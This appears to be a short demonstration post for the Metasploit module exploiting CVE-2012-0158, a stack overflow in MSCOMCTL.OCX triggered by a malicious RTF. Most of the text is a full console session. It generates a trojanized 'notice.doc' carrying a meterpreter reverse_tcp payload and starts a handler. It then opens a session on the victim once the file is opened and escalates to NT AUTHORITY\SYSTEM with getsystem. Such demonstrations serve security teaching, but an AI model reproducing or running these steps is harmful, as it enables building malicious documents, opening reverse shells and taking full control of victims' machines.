Metasploit Demo: ms12_027_mscomctl_bof (CVE-2012-0158)

Not a new module but this exploit is still seen in the wild as spam attachments.
This module is useful to demonstrate how easy it is for an attacker to exploit and take control of a vulnerable target.

This module exploits a stack buffer overflow in MSCOMCTL.OCX. It uses a malicious RTF to embed the specially crafted MSComctlLib.ListViewCtrl.2 Control as exploited in the wild on April 2012. This module targets Office 2007 and Office 2010 targets. The DEP/ASLR bypass on Office 2010 is done with the Ikazuchi ROP chain proposed by Abysssec. This chain uses “msgr3en.dll”, which will load after office got load, so the malicious file must be loaded through “File / Open” to achieve exploitation.


msf > use exploit/windows/fileformat/ms12_027_mscomctl_bof
msf exploit(ms12_027_mscomctl_bof) > set FILENAME notice.doc
msf exploit(ms12_027_mscomctl_bof) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(ms12_027_mscomctl_bof) > set LHOST
msf exploit(ms12_027_mscomctl_bof) > exploit

[*] Creating ‘notice.doc’ file …
[+] notice.doc stored at C:/Users/attacker/.msf4/local/notice.doc

//Set up the Payload handler and run it in the background

msf> use exploit/multi/handler
msf exploit(handler) > exploit -j
[*] Exploit running as background job.
msf exploit(handler) >
[*] Started reverse handler on
[*] Starting the payload handler…

//At this point the trojanized .doc is opened on the target system

[*] Sending stage (769024 bytes) to
[*] Meterpreter session 1 opened ( -> at 2013-12-03 17:07:27 -0400

msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1…

meterpreter > getuid
Server username: VICTIM-PC\vic
meterpreter > getsystem
…got system (via technique 1).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM